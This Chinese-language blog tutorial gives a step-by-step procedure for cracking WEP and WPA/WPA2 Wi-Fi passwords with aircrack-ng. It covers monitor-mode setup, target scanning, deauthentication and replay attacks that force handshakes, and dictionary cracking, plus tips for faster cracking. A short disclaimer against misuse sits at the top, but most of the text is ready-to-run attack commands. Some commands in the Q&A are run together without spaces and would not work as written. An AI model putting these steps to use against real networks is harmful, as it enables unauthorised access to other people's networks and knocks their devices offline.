使用 Aircrack-ng 破解 WEP 和 WPA/WPA2 加密的 Wi-Fi 密碼。

1.首先請(qǐng)不要使用此方法去搞破壞,去蹭Wi-Fi,因?yàn)椴谎b逼地說,我認(rèn)為技術(shù)本身的價(jià)值很大,尤其是在學(xué)習(xí)這個(gè)技術(shù)的過程中解決遇到的問題,當(dāng)經(jīng)過重重困難最后終于成功之后的喜悅又怎么能拿去蹭網(wǎng)呢。我在此過程中都是用自己路由做的測(cè)試,相信大家也可以從文中看到,所以請(qǐng)不要用技術(shù)做一些不好的事情。

2.歡迎使用Kali Linux 的朋友互相交流,大家共同進(jìn)步學(xué)習(xí)。

索引:
1.工具
2.需要了解的知識(shí)
3.破解WEP
4.破解WPA/WPA2
5.其他
6.Q&A
7.參考文章

1.用到的工具:

Airodump-ng 獲取 AP 的 MAC 信息,連接信息以及是否握手成功。

Aircrack-ng 支持基于 802.11 協(xié)議的 WEP 和 WPA/WPA2-PSK 密碼破解

Aireplay-ng 強(qiáng)行向目標(biāo) AP 發(fā)送數(shù)據(jù)包

Airmon-ng 開啟無線網(wǎng)卡的監(jiān)視模式

Wordlists.txt 字典包

2.需要了解的知識(shí):

AP(Access Point): 網(wǎng)絡(luò)接入點(diǎn),是一種連接無線或有線網(wǎng)絡(luò)的設(shè)備。就是我們俗稱的路由器。

MAC(Media Access Control Address): 相當(dāng)于網(wǎng)卡的身份證,MAC 地址本身是不能修改,但是可以通過偽造MAC 地址欺騙AP。

WEP(Wireless Encryption Protocol): 無線加密協(xié)議。很早的一種加密協(xié)議,容易破解。

WPA/WPA2(Wi-FiProtected Access): 基于WEP更安全的加密系統(tǒng)。

Handshake:握手。我的理解相當(dāng)于三次握手。

IV(Initialization Vector)s:初始化向量。

3.破解 WEP 加密的 Wi-Fi 流程(現(xiàn)在基本沒人用WEP,只做步驟演示):

3.1
<code>iwconfig #確認(rèn)網(wǎng)卡信息。</code>


表示設(shè)備WLAN0待命并且當(dāng)前模式為被管理(Managed)。

3.2
<code>airmon-ng start wlan0 #激活網(wǎng)卡至監(jiān)視模式。</code>

會(huì)發(fā)現(xiàn)不能正常開啟,有5 個(gè)進(jìn)程會(huì)導(dǎo)致錯(cuò)誤。

解決方案:
(1).
<code>ifconfig wlan0mon down #先取消wlan0mon網(wǎng)卡模式</code>
<code>iwconfig wlan0mon mode monitor #直接設(shè)置wlan0mon為監(jiān)視模式</code>
<code>ifconfig wlan0mon up #喚醒wlan0mon</code>

(2). 第2 步開始前, <code>airmon-ng check kill</code>,自動(dòng)檢查沖突程序并強(qiáng)制關(guān)閉。

使用<code>iwconfig</code>查詢發(fā)現(xiàn) wlan0mon 為監(jiān)視模式

3.3 <code>airodump-ng wlan0mon #獲取附近AP 信息。</code>

看到名為 TEST-jglimmers 的路由器信息。

這里解釋幾個(gè)參數(shù):
BSSID(Basic Service SetIdentifier): AP 的MAC 地址。
ESSID(The Extended Service Set Identifier): AP 的名稱。
PWR(Power): 信號(hào)強(qiáng)度。
Beacons: AP發(fā)出的通告編號(hào),每個(gè)接入點(diǎn)(AP)在最低速率(1M)時(shí)差不多每秒會(huì)發(fā)送10個(gè)左右的beacon,所以它們能在很遠(yuǎn)的地方就被發(fā)現(xiàn)。
#Data:當(dāng)前數(shù)據(jù)傳輸量。
#/s:過去10秒鐘內(nèi)每秒捕獲數(shù)據(jù)分組的數(shù)量。
CH(Channel): AP 所在的頻道。
MB: AP 的最大傳輸速度。MB=11 => 802.11b,MB=22 => 802.11b+, MB>22 => 802.11g。后面帶.的表示短封包標(biāo)頭,處理速度快,更利于破解。
ENC(Encryption): 使用的加密算法體系。
CIPHER: 檢測(cè)到的加密算法。#這個(gè)和ENC 的區(qū)別我確實(shí)不明白,有沒有知道的朋友可以告訴我。
AUTH(Authority): 認(rèn)證方式。
Elapsed: 用過的時(shí)間。

記錄 TEST-jglimmers 的 MAC 地址(BSSID),頻道(CH)。

BSSID: 88:25:93:5A:B5:6A
CH: 1

3.4 <code>airodump-ng --ivs -w 文件地址 --bssid BSSID wlan0mon #開始抓包, -w(write) 抓到的包保存的位置, --ivs表示只保留IVs 文件。(IVs 在2 中已解釋)</code>

可以看到有一臺(tái) MAC 地址為 48:74:6E:2B:70:02 的設(shè)備在連接 AP 。

重新開一個(gè)終端進(jìn)行下一步
3.5 <code>aireplay-ng -3 -b BSSID -h 客戶端MAC wlan0mon #理論上來講不用這一步,但是我們可以使用這條命令向 AP 發(fā)送大量數(shù)據(jù)包更快取得數(shù)據(jù)包。</code>

可以看到在第3.4 步開啟的終端中有大量數(shù)據(jù)。

3.6 <code>aireplay-ng -0 10 -a 88:25:93:5A:B5:6A -c 68:17:29:26:C3:16 wlan0mon #如果發(fā)現(xiàn)像我一樣得到的數(shù)據(jù)較少可嘗試發(fā)送數(shù)據(jù)包</code>

3.7 <code>aircrack-ng01.ivs #01.ivs 在第 3.4 步的文件夾當(dāng)中.</code>

等待破解成功。

4.破解 WPA/WPA2 加密的 Wi-Fi 流程

前面的過程和 3.1,3.2,3.3 一樣。使 wlan0mon 處于監(jiān)視模式下

4.1 <code>airodump-ng --bssid BSSID -c CH -w 文件位置 wlan0mon #-w 是抓的包輸出目錄,注意加-c,不然airodump-ng會(huì)每個(gè)頻道都會(huì)試,一直亂跳,下一步工作不好進(jìn)行。</code>



這時(shí)返回的數(shù)據(jù)表示連接上此AP 的設(shè)備信息。

重新開啟一個(gè)終端,進(jìn)行下一步
4.2 <code>aireplay-ng -0 10 -a BSSID -c STATION wlan0mon #-0 表示DeAuth模式,10表示攻擊次數(shù),-c是第3 步中的得到的STATION,即已連接上的客戶端MAC 地址。</code>



Wi-Fi的連接過程大概有三種,發(fā)現(xiàn)(Unauthenticated & Unassociated,未認(rèn)證,未連接)-認(rèn)證(Authenticated & Unassociated,認(rèn)證,未連接)-連接(Authenticated & Associated,認(rèn)證,連接)。

-0(DeAuth模式): 向客戶端發(fā)送數(shù)據(jù)包,讓客戶端誤以為是AP 發(fā)送的數(shù)據(jù)。
<code>aireplay-ng -0 10 -a BSSID-c 客戶端的 MAC wlan0mon</code>
-1(Fake authentication 模式):在WEP中允許兩種認(rèn)證類型(開放系統(tǒng)和共享密鑰)連接AP,我們?cè)诼酚善髟O(shè)置頁面可以看到。當(dāng)我沒發(fā)現(xiàn)4.1 中沒有客戶端連接時(shí)候可以使用此攻擊模式。
<code>aireplay-ng -1 0 -e ESSID -a AP的MAC -h 自己的MAC -y sharedkeyxor wlan0mon #0表示發(fā)送數(shù)據(jù)時(shí)間,-h 自己的MAC 可用<code>ifconfig</code>查詢,-y sharedkeyxor表示共享密鑰型,如果是開放系統(tǒng)則不用-y</code>
-2(Interactive packet replay):這個(gè)模式需要了解相關(guān)知識(shí),可以去Interactivepacket replay 查看。
-3(ARPrequest replay): 可以了解相關(guān)知識(shí) ARPrequest replay attack。
<code>aireplay-ng -3 -b AP的MAC -h 我們的MAC wlan0mon #可以加-r CAP.cap 加速進(jìn)程,這個(gè) CAP.cap 是上一次成功進(jìn)行 ARP 連接的 cap 包。</code>
或者直接
<code>aireplay-ng -3 -r CAP.cap wlan0mon</code>
-4( KoreKchopchop):這個(gè)模式如果成功的話可以不用知道密碼直接解密WEP數(shù)據(jù)包,但是有些AP 不支持此模式。
<code>aireplay-ng -4 -b AP的MAC -h 我們的MAC wlan0mon</code>
-5(Fragmentation): 碎片模式,也不包含密碼信息,故不討論,可去Fragmentationattack 查看詳情。
-6(CafeLatte):可以直接從客戶端系統(tǒng)中直接獲取WEP密碼,但是必須從客戶端系統(tǒng)中獲取到ARP包,并加以處理后返回給客戶端。
<code>aireplay-ng -6 -b AP的MAC -h 我們的MAC -D TEST-jglimmers #-D表示取消AP 的探測(cè)</code>
-7(Hirte): 基于上一個(gè)模式的攻擊,也是需要ARP請(qǐng)求。
<code>aireplay-ng -7 -h 我們的MAC -D TEST-jglimmers</code>
-8(WPAMigration):這個(gè)模式在我看了官方文檔后感覺非常強(qiáng)大,強(qiáng)大到我想讓大家自己去 WPAMigration Mode 看看。它可以將WPA強(qiáng)制轉(zhuǎn)換成 WEP 解密,但是僅限思科的 AP(>=IOSReleases 12.2(11)JA),并且同時(shí)連接了 WEP 和 WPA 的客戶端。
-9(Injection test): 測(cè)試一下網(wǎng)卡是否連接成功,其實(shí)我們?cè)?.2 就已經(jīng)成功,不過還是可以驗(yàn)證一下。
<code>aireplay-ng-9 -a AP的MAC-i wlan1wlan0mon# wlan1是模擬的一個(gè)AP。</code>

這時(shí)能看到第1 步中的設(shè)備出現(xiàn)了大量數(shù)據(jù)讀取。

4.3 等待握手。
當(dāng)經(jīng)過第2 步發(fā)送大量數(shù)據(jù)包之后只要發(fā)現(xiàn)第1 步中右上角出現(xiàn)了 handshake: AP的MAC(BSSID),就可以 CRTL+C 停止。

4.4 <code>aircrack-ng -w Wordlists.txt CAP-01.cap #-w表示字典包的路徑, CAP 表示第 1 步中保存的文件中 -01.cap 文件,因?yàn)槲覀儗?duì)每個(gè) AP 的嘗試可能不止一次,所以 airodump-ng 會(huì)自動(dòng)在文件名后加類似01,02這樣的數(shù)字表示次數(shù),所以記得最后破解的時(shí)候輸入正確的 CAP 包名稱。</code>



破解的速度一般顯卡也就這樣,其實(shí)我們也可以根據(jù) GPU 加速,但是我曾經(jīng)經(jīng)過好幾個(gè)月的試驗(yàn)最后發(fā)現(xiàn)我的顯卡不支持 GPU 加速。

4.5 等待 KEY FOUND!


破解成功。

5.其他
推薦一個(gè)字典生成工具 Crunch.


6.Q&A

Q: 修改成監(jiān)視模式(Monitor)失敗。
A:
(1).
<code>ifconfigwlan0mondown #先取消wlan0mon網(wǎng)卡模式</code>
<code>iwconfigwlan0monmode monitor #直接設(shè)置wlan0mon為監(jiān)視模式</code>
<code>ifconfigwlan0monup #喚醒wlan0mon</code>

(2). 所有工作開始前 <code>airmon-ngcheck kill</code> 自動(dòng)檢查沖突程序并強(qiáng)制關(guān)閉。

Q:破解之后不能正常聯(lián)網(wǎng)。
A:
<code>ifconfigwlan0mondown</code>
<code>iwconfigwlan0monmode managed</code>
<code>ifconfigwlan0monup</code>
因?yàn)橹皩?wlan0mon 改成了 監(jiān)視模式(Monitor),現(xiàn)在要改回來(Managed)。

Q:不能握手。
A:嘗試物理距離靠近路由,重復(fù)發(fā)送數(shù)據(jù)包,再等等。

Q:不能破解。
A:換強(qiáng)字典包。

Q:破解速度太慢。
A:嘗試 GPU 加速,或使用 hashcat 加速。

7.參考文章

http://www.aircrack-ng.org/documentation.html

http://www.aircrack-ng.org/doku.php?id=airodump-ng

http://www.aircrack-ng.org/doku.php?id=fake_authentication

http://www.thinksaas.cn/group/topic/120506/

http://m.blog.chinaunix.net/uid-29170659-id-4944188.html

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容